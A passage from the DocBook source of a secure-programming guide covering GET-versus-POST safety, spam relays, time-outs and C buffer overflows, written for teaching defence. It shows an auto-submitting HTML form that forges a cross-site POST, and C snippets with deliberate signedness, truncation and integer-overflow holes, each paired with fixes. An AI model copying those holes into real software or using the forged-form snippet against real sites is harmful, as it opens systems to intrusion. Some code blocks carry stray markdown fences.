methods other than HTTP, and in this case,
the web server may never see the data as part of the input process.
Unless the filtering is implemented in all places where dynamic data
is entered, the data elements may still remain tainted.
</para>

<para>
However, I don't agree with CERT on this point for all cases.
The problem is that it's just as easy to forget to filter all the output
as the input, and allowing ``tainted'' input into your system
is a disaster waiting to happen anyway.
A secure program has to filter its inputs anyway, so it's sometimes better
to include all of these checks as part of the input filtering
(so that maintainers can see what the rules really are).
And finally, in some secure programs there are many different program
locations that may output a value, but only a very few ways and locations
where data can be input into it;
in such cases filtering on input may be a better idea.
</para>
</sect2>

</sect1>

<sect1 id="avoid-get-non-queries">
<title>Forbid HTTP GET To Perform Non-Queries</title>
<para>
Web-based applications using HTTP should prevent the use of
the HTTP ``GET'' or ``HEAD'' method for anything other than queries.
HTTP includes a number of different methods; the two most popular methods
used are GET and POST.
Both GET and POST can be used to transmit data from a form, but the
GET method transmits data in the URL, while the POST method
transmits data separately.
</para>

<para>
The security problem of using GET to perform non-queries
(such as changing data, transferring money, or signing up for a service)
is that an attacker can create a hypertext link
with a URL that includes malicious form data.
If the attacker convinces a victim to click on the link
(in the case of a hypertext link),
or even just view a page (in the case of transcluded information
such as images from HTML's img tag), the victim
will perform a GET.
When the GET is performed,
all of the form data created by the attacker will be sent by the victim
to the link specified.
This is a cross-site malicious content attack, as discussed further in
<xref linkend="cross-site-malicious-content">.
</para>

<para>
If the only action that a malicious cross-site content attack can perform is
to make the user view unexpected data, this isn't as serious a problem.
This can still be a problem, of course, since there are some attacks
that can be made using this capability.
For example, there's a
potential loss of privacy due to the user requesting something unexpected,
and there are possible real-world effects from appearing to request illegal or
incriminating material.
In addition, by making the user request the information
in certain ways, the attacker may expose that information
in ways it normally wouldn't be exposed.
However, even more serious effects can be caused if the malicious attacker
can cause not just data viewing, but changes in data, through
a cross-site link.
</para>

<para>
Typical HTTP interfaces (such as most CGI libraries) normally hide the
differences between GET and POST, since for getting data it's useful
to treat the methods ``the same way.''
However, for actions that actually cause something other than a data query,
check to see if the request is something other than POST;
if it is, simply display a filled-in form with the data given and ask
the user to confirm that they really mean the request.
This will prevent cross-site malicious content attacks, while still
giving users the convenience of confirming the action with
a single click.
</para>
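<para>
For a CGI program written in C, the check described above might look
like the following sketch.
CGI programs receive the request method in the REQUEST_METHOD
environment variable; the two function names are invented for this
example, and displaying the confirmation form is left to the caller.
<programlisting>
<![CDATA[
#include <stdlib.h>
#include <string.h>

/* Return 1 if a state-changing request may be carried out directly,
   or 0 if the program should instead show a confirmation form.
   Only an exact "POST" is accepted; anything else, including a
   missing method, falls back to confirmation. */
int action_allowed_for_method(const char *method)
{
    return method != NULL && strcmp(method, "POST") == 0;
}

/* Apply the same test to the current CGI request. */
int action_allowed_for_this_request(void)
{
    return action_allowed_for_method(getenv("REQUEST_METHOD"));
}
]]>
</programlisting>
The test is written as ``is this POST?'' rather than ``is this GET?''
so that HEAD and any unexpected method are also sent to the
confirmation step.
</para>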

<para>
Indeed, this behavior is strongly recommended by the HTTP specification.
According to the HTTP 1.1 specification (IETF RFC 2616 section 9.1.1),
``the GET and HEAD methods SHOULD NOT have the significance of
taking an action other than retrieval.
These methods ought to be considered "safe".
This allows user agents to represent other methods,
such as POST, PUT and DELETE, in a special way,
so that the user is made aware of the fact that a possibly
unsafe action is being requested.''
</para>

<para>
In the interest of fairness, I should note that this doesn't
completely solve the problem, because on some browsers
(in some configurations) scripted posts can do the same thing.
For example, imagine a web browser with ECMAscript (Javascript) enabled
receiving the following HTML snippet - on some browsers, simply
displaying this HTML snippet will
automatically force the user to send a POST request to a website
chosen by the attacker, with form data defined by the attacker:
<programlisting>
<![CDATA[
  <form action=http://remote/script.cgi method=post name=b>
    <input type=hidden name=action value="do something">
    <input type=submit>
  </form>
  <script>document.b.submit()</script>
]]>
</programlisting>
My thanks to David deVitry for pointing this out.
However, although this advice doesn't solve all problems, it's
still worth doing.
In part, this is because the remaining problem
can be solved by smarter web browsers
(e.g., by always confirming the data before
allowing ECMAscript to send a web form) or
by web browser configuration (e.g., disabling ECMAscript).
Also, this attack doesn't work in many cross-site scripting exploits, because
many websites don't allow users to post ``script'' commands but do
allow arbitrary URL links.
Thus, limiting the actions a GET command can perform to queries
significantly improves web application security.
</para>

</sect1>

<sect1 id="counter-spam">
<title>Counter SPAM</title>
<para>
Any program that can send email elsewhere, by request from the network,
can be used to transport spam.
Spam is the usual name for unsolicited bulk email (UBE) or
mass unsolicited email.
It's also sometimes called unsolicited commercial email (UCE), though
that name is misleading - not all spam is commercial.
For a discussion of why spam is such a serious problem and more general
discussion about it,
see my essay at
<ulink url="http://www.dwheeler.com/essays/stopspam.html">http://www.dwheeler.com/essays/stopspam.html</ulink>, as well as
<ulink url="http://mail-abuse.org/">http://mail-abuse.org/</ulink>,
<ulink url="http://spam.abuse.net/">http://spam.abuse.net/</ulink>,
<ulink url="http://www.cauce.org/">CAUCE</ulink>, and
<ulink url="http://www.faqs.org/rfcs/rfc2635.html">IETF RFC 2635</ulink>.
Spam receivers and intermediaries bear most of the cost
of spam, while the spammer spends very little to send it.
Therefore many people regard spam as a theft of service, not just some
harmless activity, and that number increases as the amount of
spam increases.
</para>
<para>
If your program can be used to generate email sent to others
(such as a mail transfer agent, generator of data sent by email, or
a mailing list manager),
be sure to write your program to prevent its unauthorized use as a
mail relay.
A program should usually only allow legitimate authorized users
to send email to others (e.g., those inside that company's mail server
or those legitimately subscribed to the service).
More information about this is in
<ulink url="http://www.faqs.org/rfcs/rfc2505.html">IETF RFC 2505</ulink>.
Also, if you manage a mailing list, make sure that it can enforce the
rule that only subscribers can post to the list, and create a ``log in''
feature that will make it somewhat harder for spammers to subscribe, spam, and
unsubscribe easily.
</para>
<para>
One way to more directly counter SPAM is to incorporate support for the
MAPS (Mail Abuse Prevention System LLC) RBL (Realtime Blackhole List),
which maintains in real-time
a list of IP addresses where SPAM is known to originate.
For more information, see
<ulink url="http://mail-abuse.org/rbl/">http://mail-abuse.org/rbl/</ulink>.
Many current Mail Transfer Agents (MTAs) already support the RBL;
see their websites for how to configure them.
The usual way to use the RBL is to simply refuse to accept any requests
from IP addresses in the blackhole list;
this is harsh, but it solves the problem.
Another similar service is the Open Relay Database (ORDB) at
<ulink url="http://ordb.org">http://ordb.org</ulink>, which identifies
dynamically those sites that permit open email relays
(open email relays are misconfigured email servers that allow spammers to
send email through them).
Another location for more information is
<ulink url="http://www.spews.org">SPEWS</ulink>.
I believe there are other similar services as well.
</para>
<para>
I suggest that many systems and programs,
by default, enable spam blocking if they
can send email on to others whose identity is under control
of a remote user - and that includes MTAs.
At the least, consider this.
There are real problems with this suggestion, of course -
you might (rarely) inhibit communication with a legitimate user.
On the other hand, if you don't block spam, then it's likely that everyone
<emphasis>else</emphasis> will blackhole your system
(and thus ignore your emails).
It's not a simple issue, because no matter what you do, some people
will not allow you to send them email.
And of course, how well do you trust the organization keeping up the
real-time blackhole list - will they add truly innocent sites to the
blackhole list, and will they remove sites from the blackhole list
once all is okay?
Thus, it becomes a trade-off - is it more important to talk to spammers
(and a few innocents as well), or is it more important to talk to
those many other systems with spam blocks
(losing those innocents who share equipment with spammers)?
Obviously, this must be configurable.
This is somewhat controversial advice, so consider your options for
your circumstance.
</para>
</sect1>

<sect1 id="limit-time">
<title>Limit Valid Input Time and Load Level</title>

<para>
Place time-outs and load level limits, especially on incoming network data.
Otherwise, an attacker might be able to easily cause a denial of service
by constantly requesting the service.
</para>
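<para>
As a small illustration of the time-out half of this advice, here is a
C sketch that waits a bounded time for input using poll(2) before
calling read(2).
The function name read_with_timeout() and its return-value convention
are assumptions made for this example.
It does not address load limits, and because it restarts the wait when
interrupted by a signal, the total wait can exceed the requested
time-out in a program that receives many signals.
<programlisting>
<![CDATA[
#include <errno.h>
#include <poll.h>
#include <unistd.h>

/* Wait up to timeout_ms milliseconds for data on fd, then read at most
   count bytes.  Returns the number of bytes read (0 means end of file),
   -1 on error, or -2 if no data arrived in time. */
ssize_t read_with_timeout(int fd, void *buf, size_t count, int timeout_ms)
{
    struct pollfd pfd;
    int ready;

    pfd.fd = fd;
    pfd.events = POLLIN;
    pfd.revents = 0;

    do {
        ready = poll(&pfd, 1, timeout_ms);
    } while (ready == -1 && errno == EINTR);   /* retry if interrupted */

    if (ready == -1) return -1;
    if (ready == 0) return -2;                  /* timed out */
    return read(fd, buf, count);
}
]]>
</programlisting>
A server would typically close the connection when it sees the
time-out result, so that a silent client cannot tie up resources
indefinitely.
</para>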

</sect1>

</chapter>

<chapter id="buffer-overflow">
<title>Avoid Buffer Overflow</title>

<epigraph>
<attribution>Amos 3:11 (NIV)</attribution>
<para>
An enemy will overrun the land;
he will pull down your strongholds and
plunder your fortresses.
</para>
</epigraph>

<para>
An extremely common security flaw is vulnerability to a ``buffer overflow''.
Buffer overflows are also called ``buffer overruns'', and there are
many kinds of buffer overflow attacks (including
``stack smashing'' and ``heap smashing'' attacks).
Technically, a buffer overflow is a problem with the program's internal
implementation, but it's such a common and serious problem that
I've placed this information in its own chapter.
To give you an idea of how important this subject is,
at the CERT, 9 of 13 advisories in 1998 and at least half of
the 1999 advisories involved buffer overflows.
An informal 1999 survey on Bugtraq found that approximately 2/3 of the
respondents felt that buffer overflows were the leading cause of
system security vulnerability (the remaining respondents identified
``mis-configuration'' as the leading cause) [Cowan 1999].
This is an old, well-known problem, yet it continues to resurface
[McGraw 2000].
<!-- ???: Get the stats from the libsafe paper -->
</para>

<para>
A buffer overflow occurs when you write a set of values
(usually a string of characters) into a fixed length buffer
and write at least one value outside that buffer's boundaries
(usually past its end).
A buffer overflow can occur when reading input from the user into a buffer,
but it can also occur during other kinds of processing in a program.
</para>

<para>
If a secure program permits a buffer overflow, the overflow can often be
exploited by an adversary.
If the buffer is a local C variable, the overflow can be used to
force the function to run code of an attacker's choosing.
This specific variation is often called a ``stack smashing'' attack.
A buffer in the heap isn't much better; attackers may be able to
use such overflows to control other variables in the program.
More details can be found from Aleph1 [1996], Mudge [1995], LSD [2001],
or Nathan P. Smith's
"Stack Smashing Security Vulnerabilities" website at
<ulink
url="http://destroy.net/machines/security/">http://destroy.net/machines/security/</ulink>.
A discussion of the problem and some ways to counter it is given
by Crispin Cowan et al, 2000, at
<ulink url="http://immunix.org/StackGuard/discex00.pdf">
http://immunix.org/StackGuard/discex00.pdf</ulink>.
<!--
Buffer Overflows:
Attacks and Defenses for the Vulnerability of the Decade.
Crispin Cowan, Perry Wagle, Calton Pu,
Steve Beattie, and Jonathan Walpole
Department of Computer Science and Engineering
Oregon Graduate Institute of Science & Technology

It appeared at the DARPA DISCEX conference
http://schafercorp-ballston.com/discex, and again as an invited talk
at the SANS 2000 conference http://www.sans.org/sans2000/sans2000.htm

-->
A discussion of the problem and some ways to counter it in Linux
is given by
Pierre-Alain Fayolle and Vincent Glaume
at
<ulink url="http://www.enseirb.fr/~glaume/indexen.html">
http://www.enseirb.fr/~glaume/indexen.html</ulink>.
<!-- A Buffer Overflow Study
Attacks & Defenses
-->
<!--

On Bugtraq:
Subject: Re: A buffer overflow study - generic protections
From: Crispin Cowan <crispin@wirex.com>
Date: Tue, 02 Apr 2002 14:02:15 -0800
To: bugtraq@securityfocus.com

The similarities [of these two papers]
are substantial: we also categorized the attack space
(kinds of buffer overflows), surveyed the defenses, and considered
optimal combinations of defenses to get good coverage at reasonable
cost. Differences:

    * Our survey was much broader. We covered:
          * Non-executable buffers (i.e. Solar Designer's non-executable
            stack patch, and a similar feature in Solaris)
          * Array bunds checking (Compaq's ccc compiler, and the bounds
            checking GCC built by Jones & Kelly and maintained by Herman
            ten Brugge, Purify, and type safe languages such as Java)
          * Code pointer integrity checking (StackGuard, and the
            hand-coded stack introspection that Snarskii built into
            FreeBSD's libc)
    * We did not cover:
          * libsafe: it did not exist at the time
          * grsecurity: it is just a derivative of Solar Designer's work
          * PAX: it did not exist at the time
          * Prelude: I don't understand how a general purpose host
            intrusion detection system bears on a survey of buffer overflows
          * Stack Shield: it is just a weak immitation of StackGuard,
            with no advantages, and substantial disadvantages
    * We came to a somewhat similar conclusion: that a combination of
      tools was the ideal defense. However, our preferred combo was
      StackGuard + Solar Designer's non-executable stack patch, which is
      what we actually ship in Immunix.
          * StackGuard offers the best resistance to "stack smashing"
            attacks
          * Non-executable stack segments offer substantial resistance
            to code injection (payload)
          * The two techniques are transparently compatible, and the
            combined performance overhead is nearly zero
    * As above, we did not consider PAX, but we would still not recomend
      it for most applications: the 10% macrobenchmark performance hit
      is pretty high.
    * We are mystified why Vincent et al recomend Stack Shield instead
      of StackGuard: Stack Shield offers no advantages (it is not more
      secure and it is not faster) and is much more problematic to deploy.
    * Libsafe vs. StackGuard or Stack Shield is a true decision: Libsafe
      is incompatible with compiler techniques that munge the call stack
      (and incompatible with -fno-frame-pointer) so you have to choose
      one or the other
-->
</para>

<para>
Most high-level programming languages are essentially
immune to this problem, either
because they automatically resize arrays (e.g., Perl), or because they normally
detect and prevent buffer overflows (e.g., Ada95).
However, the C language provides no protection against
such problems, and C++ can be easily used in ways to cause this problem too.
Assembly language also provides no protection, and some languages
that normally include such protection (e.g., Ada and Pascal) can have
this protection disabled (for performance reasons).
Even if most of your program is written in another language,
many library routines are written in C or C++, as well as ``glue'' code to
call them, so other languages often don't provide as complete a protection
from buffer overflows as you'd like.
</para>

<sect1 id="dangers-c">
<title>Dangers in C/C++</title>

<para>
C users must avoid using dangerous functions that do not check bounds
unless they've ensured that the bounds will never get exceeded.
Functions to avoid in most cases (or ensure protection) include
the functions strcpy(3), strcat(3), sprintf(3)
(with cousin vsprintf(3)), and gets(3).
These should be replaced with functions such as strncpy(3), strncat(3),
snprintf(3), and fgets(3) respectively, but see the discussion below.
The function strlen(3) should be avoided unless you can ensure that there
will be a terminating NIL character to find.
The scanf() family (scanf(3), fscanf(3),  sscanf(3),  vscanf(3),
vsscanf(3), and vfscanf(3)) is often dangerous to use; do not use it
to send data to a string without controlling the maximum length
(the format %s is a particularly common problem).
Other dangerous functions that may permit buffer overruns (depending on their
use) include
realpath(3), getopt(3), getpass(3),
streadd(3), strecpy(3), and strtrns(3).
You must be careful with getwd(3); the buffer sent to getwd(3) must be
at least PATH_MAX bytes long.
The select(2) helper macros
FD_SET(), FD_CLR(), and FD_ISSET() do not check that the index fd
is within bounds; make sure that fd &gt;= 0 and fd &lt; FD_SETSIZE
(this particular one has been exploited in pppd).
</para>
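<para>
For the select(2) macros, the bounds check can be wrapped in a small
helper so it is never forgotten.
An fd_set has room for descriptors 0 through FD_SETSIZE-1, so
FD_SETSIZE itself is already out of range.
The name checked_fd_set() below is hypothetical; similar wrappers
could be written for FD_CLR() and FD_ISSET().
<programlisting>
<![CDATA[
#include <sys/select.h>

/* Add fd to set only if it is a valid index for an fd_set.
   Returns 0 on success and -1 if fd is out of range. */
int checked_fd_set(int fd, fd_set *set)
{
    if (set == NULL || fd < 0 || fd >= FD_SETSIZE) return -1;
    FD_SET(fd, set);
    return 0;
}
]]>
</programlisting>
</para>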

<para>
Unfortunately, snprintf()'s variants have additional problems.
Officially, snprintf() is not a standard C function in the ISO 1990
(ANSI 1989) standard, though sprintf() is,
so not all systems include snprintf().
Even worse, some systems' snprintf() do not actually protect
against buffer overflows; they just call sprintf directly.
Old versions of Linux's libc4 depended on a ``libbsd'' that did this
horrible thing, and I'm told that some old HP systems did the same.
Linux's current version of snprintf is known to work correctly, that is, it
does actually respect the boundary requested.
The return value of snprintf() varies as well;
the Single Unix Specification (SUS) version 2
and the C99 standard differ on what is returned by snprintf().
Finally, it appears that at least some versions of
snprintf don't guarantee that its string will end in NIL; if the
string is too long, it won't include NIL at all.
Note that the glib library (the basis of GTK, and not the same as the
GNU C library glibc) has a g_snprintf(), which
has a consistent return semantic, always NIL-terminates, and
most importantly always respects the buffer length.
<!-- libsafe protects:
       [vf]scanf(const char *format, ...)
              May overflow its arguments.
       realpath(char *path, char resolved_path[])
              May overflow the path buffer.
       [v]sprintf(char *str, const char *format, ...)
              May overflow the str buffer.
-->
</para>
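<para>
If you must use the system's own snprintf() family, a thin wrapper can
paper over some of these differences.
The sketch below is one possible approach, not a complete portability
layer: the name checked_snprintf() is invented here, and it assumes
that vsnprintf() exists, respects the size it is given, and on
truncation returns either the C99 ``length that would have been
written'' or a negative value.
It cannot help on a system whose snprintf() ignores the buffer size.
<programlisting>
<![CDATA[
#include <stdarg.h>
#include <stdio.h>

/* Format into buf (of the given size).  Returns 0 if the whole result
   fit, or -1 on error or truncation.  buf is always terminated. */
int checked_snprintf(char *buf, size_t size, const char *fmt, ...)
{
    va_list ap;
    int n;

    if (buf == NULL || size == 0 || fmt == NULL) return -1;

    va_start(ap, fmt);
    n = vsnprintf(buf, size, fmt, ap);
    va_end(ap);

    buf[size - 1] = '\0';   /* terminate even if the library did not */

    /* C99 returns the length that would have been written, so
       n >= size signals truncation; some older versions return a
       negative value instead. */
    if (n < 0 || (size_t)n >= size) return -1;
    return 0;
}
]]>
</programlisting>
Callers should treat a return of -1 as a failure to be handled, not as
a harmless shortening of the output.
</para>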

<para>
Of course, the problem is more than just calling string functions poorly.
Here are a few additional examples of types of buffer overflow problems,
graciously suggested by Timo Sirainen, involving manipulation of
numbers to cause buffer overflows.
<!-- http://irccrew.org/~cras/security/flaws.html -->
</para>

<para>
First, there's the problem of signedness.
If you read data that affects the buffer size,
such as the "number of characters to be read,"
be sure to check whether the number is less than zero (or less than one,
if a zero length makes no sense).
Otherwise, the negative number may be cast to an unsigned number,
and the resulting large positive number
may then permit a buffer overflow problem.
Note that sometimes an attacker can provide a large positive number and
have the same thing happen;
in some cases, the large value will be interpreted as a negative number
(slipping by the check for large numbers if there's no check
for a less-than-one value),
and then be interpreted later into a large positive value.

<programlisting>
<![CDATA[
 /* 1) signedness - DO NOT DO THIS. */
 char *buf;
 int i, len;

 read(fd, &len, sizeof(len));

 /* OOPS!  We forgot to check for < 0 */
 if (len > 8000) { error("too large length"); return; }

 buf = malloc(len);
 read(fd, buf, len); /* negative len is cast to a huge unsigned value */
]]>
</programlisting>
</para>
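<para>
For contrast, here is a sketch of how the same read might be written
with both ends of the range checked.
The names read_fully() and read_counted() and the MAX_RECORD_LEN
constant are made up for this example; the 8000 limit is simply the one
used in the flawed code above.
The sketch also checks the results of read(2) and malloc(3), which the
flawed example ignores.
<programlisting>
<![CDATA[
#include <stdlib.h>
#include <unistd.h>

#define MAX_RECORD_LEN 8000   /* same limit as the example above */

/* Read exactly count bytes from fd; return 0 on success, -1 otherwise. */
static int read_fully(int fd, void *buf, size_t count)
{
    char *p = buf;
    while (count > 0) {
        ssize_t n = read(fd, p, count);
        if (n <= 0) return -1;       /* error or premature end of file */
        p += n;
        count -= (size_t)n;
    }
    return 0;
}

/* Read an int length followed by that many bytes.  Returns a malloc()ed
   buffer (caller frees) and stores the length in *len_out, or returns
   NULL if the length is out of range or a read fails. */
char *read_counted(int fd, int *len_out)
{
    int len;
    char *buf;

    if (len_out == NULL) return NULL;
    if (read_fully(fd, &len, sizeof(len)) != 0) return NULL;

    /* Check BOTH ends of the range before len is used as a size. */
    if (len < 1 || len > MAX_RECORD_LEN) return NULL;

    buf = malloc((size_t)len);
    if (buf == NULL) return NULL;
    if (read_fully(fd, buf, (size_t)len) != 0) { free(buf); return NULL; }

    *len_out = len;
    return buf;
}
]]>
</programlisting>
Because len is known to be positive before it is converted to size_t,
the conversion can no longer turn a negative value into a huge one.
</para>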

<para>
Here's a second example identified by Timo Sirainen,
involving integer size truncation.
Sometimes the different sizes of integers
can be exploited to cause a buffer overflow.
Basically, make sure that you don't truncate any integer results used to
compute buffer sizes.
Here's Timo's example for 64-bit architectures:

<!--
, showing two cases of this problem - one
for 32 bit architectures with large file support
(where the offset values are 64 bits), and another for 64-bit architectures.
<programlisting>
 /* For 32bit architectures with large file support: */

 char *buf;
 off_t len;

 read(fd, &len, sizeof(len));

 /* we're relying on malloc() to fail with too large values */
 if (len <= 0) { error("invalid length"); return; }

 /* 64bit off_t gets truncated to 32bit size_t */
 buf = malloc(len);
 read(fd, buf, len);
-->

<programlisting>
<![CDATA[
 /* An example of an ERROR for some 64-bit architectures,
    if "unsigned int" is 32 bits and "size_t" is 64 bits: */

 void *mymalloc(unsigned int size) { return malloc(size); }

 char *buf;
 size_t len;

 read(fd, &len, sizeof(len));

 /* we forgot to check the maximum length */

 /* 64-bit size_t gets truncated to 32-bit unsigned int */
 buf = mymalloc(len);
 read(fd, buf, len);
]]>
</programlisting>
</para>
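<para>
One way to avoid this kind of truncation is to compare the value
against the limit of the narrower type before converting it.
The sketch below keeps the mymalloc() wrapper from the example above and
adds a hypothetical mymalloc_checked() in front of it; rejecting a zero
length is an extra assumption made here for simplicity.
<programlisting>
<![CDATA[
#include <limits.h>
#include <stdlib.h>

void *mymalloc(unsigned int size) { return malloc(size); }

/* Allocate len bytes through mymalloc(), refusing any length that
   would not survive the conversion to unsigned int. */
void *mymalloc_checked(size_t len)
{
    if (len == 0 || len > UINT_MAX) return NULL;
    return mymalloc((unsigned int)len);
}
]]>
</programlisting>
In real code it is usually better still to apply a much smaller,
application-specific maximum, so that an attacker cannot request
gigabytes of memory either.
</para>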

<para>
Here's a third example from Timo Sirainen, involving integer overflow.
This is particularly nasty when combined with malloc(); an attacker
may be able to create a situation where the computed buffer size
is less than the data to be placed in it.
Here is Timo's sample:
<programlisting>
<![CDATA[
 /* 3) integer overflow */
 char *buf;
 size_t len;

 read(fd, &len, sizeof(len));

 /* we forgot to check the maximum length */

 buf = malloc(len+1); /* +1 can overflow to malloc(0) */
 read(fd, buf, len);
 buf[len] = '\0';
]]>
</programlisting>
</para>
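<para>
A simple defense is to check the length against a sensible maximum
before doing any arithmetic on it.
In the sketch below, the name alloc_terminated() and the MAX_STRING_LEN
value are illustrative assumptions; the point is only that the range
check comes before the ``+1''.
<programlisting>
<![CDATA[
#include <stdlib.h>

#define MAX_STRING_LEN 65536   /* illustrative cap; choose one that suits the data */

/* Allocate room for len characters plus a terminator.  Returns NULL if
   len is too large or memory is unavailable. */
char *alloc_terminated(size_t len)
{
    char *buf;

    /* Reject oversized lengths first; this also rules out the maximum
       size_t value, the one value for which len + 1 wraps around to 0. */
    if (len > MAX_STRING_LEN) return NULL;

    buf = malloc(len + 1);
    if (buf != NULL) buf[len] = '\0';
    return buf;
}
]]>
</programlisting>
</para>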
</sect1>

<sect1 id="library-c">
<title>Library Solutions in C/C++</title>

<para>
One partial solution in C/C++ is to use library functions that do not have
buffer overflow problems.
The first subsection describes the ``standard C library'' solution, which
can work but has its disadvantages.
The next subsection describes the general security issues of both
fixed length and dynamically reallocated approaches to buffers.
The following subsections describe various alternative libraries,
such as strlcpy and libmib.
Note that these don't solve all problems; you still have to code
extremely carefully in C/C++ to avoid all buffer overflow situations.
</para>

<sect2 id="buffer-standard-solution">
<title>Standard C Library Solution</title>

<para>
The ``standard'' solution to prevent buffer overflow in C
(which is also used in some C++ programs)
is to use the standard C library calls that defend against these problems.
This approach depends heavily on the standard library functions
strncpy(3) and strncat(3).
If you choose this approach, beware: these calls have somewhat surprising
semantics and are hard to use correctly.
The function strncpy(3) does not NIL-terminate the destination string
if the source string's length is at least the size given for the
destination, so be sure to set the last character of the destination
string to NIL after calling strncpy(3).
If you're going to reuse the same buffer many times,
an efficient approach is to tell strncpy() that the buffer is one
character shorter than it actually is and set the last character to
NIL once before use.
Both strncpy(3) and strncat(3) require that you pass
the amount of space left available, a computation
that is easy to get wrong (and getting it wrong could permit a
buffer overflow attack).
Neither provides a simple mechanism to determine if an overflow has occurred.
Finally, strncpy(3) has a significant performance penalty compared
to the strcpy(3) it supposedly replaces,
because <emphasis remap="it">strncpy(3) NIL-fills the remainder of the destination</emphasis>.
I've gotten emails expressing surprise over this last point, but this is
clearly stated in Kernighan and Ritchie second edition
[Kernighan 1988, page 249], and this behavior is clearly documented in
the man pages for Linux, FreeBSD, and Solaris.
This means that just changing from strcpy to strncpy can cause a severe
reduction in performance, for no good reason in most cases.
</para>

<para>
Warning!!
The function strncpy(s1, s2, n) can also be used as
a way of copying only part of s2, where n is less than strlen(s2).
When used this way, strncpy() provides no protection against
buffer overflow by itself - you have to take
separate actions to ensure that n is no larger than the buffer
that s1 points to.
Also, when used this way, strncpy() does not add a trailing NIL
after copying n characters.
This makes it harder to determine if a program using strncpy() is secure.
</para>
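<para>
To make the strncpy(3) advice concrete, here is a minimal sketch of a
wrapper that always terminates the destination and reports truncation
separately.
The helper name copy_string and its return convention are my own
assumptions for illustration; they are not part of the standard library.
<programlisting>
<![CDATA[
```c
#include <string.h>

/* Copy src into dst (a buffer of dst_size bytes) using strncpy(3).
   Returns 0 if the whole string fit, -1 if it was truncated or if
   dst_size is 0.  copy_string is a hypothetical helper name. */
int copy_string(char *dst, size_t dst_size, const char *src)
{
    if (dst_size == 0)
        return -1;

    /* Tell strncpy() the buffer is one byte shorter than it really is... */
    strncpy(dst, src, dst_size - 1);
    /* ...and always terminate it ourselves. */
    dst[dst_size - 1] = '\0';

    /* strncpy() reports nothing about truncation, so check separately. */
    return (strlen(src) < dst_size) ? 0 : -1;
}
```
]]>
</programlisting>
Note that the extra strlen() call adds to the cost of the NIL-filling
that strncpy() already does.
</para>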

<para>
<!-- from Hudin Lucian, BUGTRAQ - 29 Jun 2000 -->
<!-- David A. Wheeler checked it and found that it was WRONG - 18 July 2000 -->
<!-- Sean Winn reaffirmed this 28 Oct 2000.  Wheeler rechecked, and found
     that his code was wrong.  Text here was rewritten as a result. -->
You can also use sprintf() while preventing
buffer overflows, but you need to be careful when doing so;
it's so easy to misapply that it's hard to recommend.
The sprintf control string can contain various conversion specifiers
(e.g., "%s"), and the control specifiers can have optional
field width (e.g., "%10s") and precision (e.g., "%.10s") specifications.
These look quite similar (the only difference is a period)
but they are very different.
The field width only
specifies a <emphasis>minimum</emphasis> length and is
completely worthless for preventing buffer overflows.
In contrast, the precision specification specifies the maximum
length that the particular string may have in its output when
used as a string conversion specifier - and thus it can be used
to protect against buffer overflows.
Note that the precision specification only specifies the total maximum
length when dealing with a string; it has a different meaning for
other conversion operations.
If the size is given as a precision of "*", then you can pass the maximum size
as a parameter (e.g., the result of a sizeof() operation, cast to int
because "*" consumes an int argument).
This is most easily shown by an example - here's the wrong and right
way to use sprintf() to protect against buffer overflows:
<programlisting width="61">
 char buf[BUFFER_SIZE];
 /* WRONG - a field width is only a minimum: */
 sprintf(buf, "%*s",  (int)(sizeof(buf)-1), "long-string");
 /* RIGHT - a precision is a maximum for %s: */
 sprintf(buf, "%.*s", (int)(sizeof(buf)-1), "long-string");
</programlisting>
In theory, sprintf() should be very helpful because you can use it
to specify complex formats.
Sadly, it's easy to get things wrong with sprintf().
If the format is complex, you
need to make sure that the destination is large enough for the largest
possible size of the <emphasis>entire</emphasis>
format, but the precision field only controls
the size of one parameter.
The "largest possible" value is often hard to determine when a
complicated output is being created.
If a program doesn't allocate quite enough space for the longest possible
combination, a buffer overflow vulnerability may open up.
Also, sprintf() appends a NIL to the destination
after the entire operation is complete -
this extra character is easy to forget and creates an opportunity
for off-by-one errors.
So, while this works, it can be painful to use in some circumstances.
</para>
<para>
Also, a quick note about the code above - note that the sizeof()
operation used the size of an array.
If the code were changed so that ``buf'' was a pointer to some
allocated memory, then all ``sizeof()'' operations would have to be
changed (or sizeof would just measure the size of a pointer, which isn't
enough space for most values).
</para>
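<para>
When the format contains fixed text as well as a string parameter, the
precision has to leave room for that text and for the terminating NIL.
The following is a minimal sketch of that arithmetic; the function
format_greeting and the size GREETING_SIZE are hypothetical names
used only for illustration.
<programlisting>
<![CDATA[
```c
#include <stdio.h>

#define GREETING_SIZE 32   /* hypothetical buffer size */

/* Write "Hello, <name>!" into out, which must have GREETING_SIZE bytes.
   The fixed text "Hello, " and "!" takes 8 characters and the
   terminating NIL takes 1, so name may contribute at most
   GREETING_SIZE - 9 characters.  sizeof("Hello, !") is exactly 9. */
void format_greeting(char out[GREETING_SIZE], const char *name)
{
    /* "*" consumes an int argument, so the precision is cast to int. */
    int max_name = (int)(GREETING_SIZE - sizeof("Hello, !"));
    sprintf(out, "Hello, %.*s!", max_name, name);
}
```
]]>
</programlisting>
If the fixed text in the format ever changes, the string inside sizeof()
must change with it, which is exactly the kind of bookkeeping that makes
sprintf() easy to misapply.
</para>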

<para>
The scanf() family is sadly a little murky as well.
An obvious question is whether or not the maximum width value can
be used in %s to prevent these attacks.
There are multiple official specifications for scanf();
some clearly state that the width parameter is the absolutely largest
number of characters, while others aren't as clear.
<!-- IEEE Std 1003.1-2001 is clear that max widths must be implemented,
  http://www.opengroup.org/onlinepubs/007904975/functions/scanf.html;
  the Single Unix Spec is much less clear. -->
The biggest problem is implementations; modern implementations
that I know of do support maximum widths, but I cannot say with
certainty that all libraries properly implement maximum widths.
The safest approach is to do things yourself in such cases.
However, few will fault you if you simply use scanf and include the
widths in the format strings
(but remember that the width does not count the terminating \0, so the
buffer must be at least one byte larger than the width).
If you do use scanf, it's best to include a test in your installation
scripts to ensure that the library properly limits length.

</para>
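<para>
Here is a minimal sketch of a width-limited %s conversion, using sscanf()
so that it is easy to exercise.
The names first_word and WORD_MAX are hypothetical.
A small check like this could also serve as the installation-time test
suggested above, by feeding it an overlong word and confirming that
nothing is written past the buffer.
<programlisting>
<![CDATA[
```c
#include <stdio.h>

#define WORD_MAX 15   /* hypothetical limit on a word's length */

/* Extract the first whitespace-delimited word of line into word.
   The width in "%15s" must match WORD_MAX; it does not count the
   terminating NIL, so the buffer has WORD_MAX + 1 bytes.
   Returns 1 if a word was stored, 0 otherwise. */
int first_word(const char *line, char word[WORD_MAX + 1])
{
    return sscanf(line, "%15s", word) == 1;
}
```
]]>
</programlisting>
</para>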

</sect2>

<sect2 id="static-vs-dynamic-buffers">
<title>Static and Dynamically Allocated Buffers</title>

<para>
Functions such as strncpy
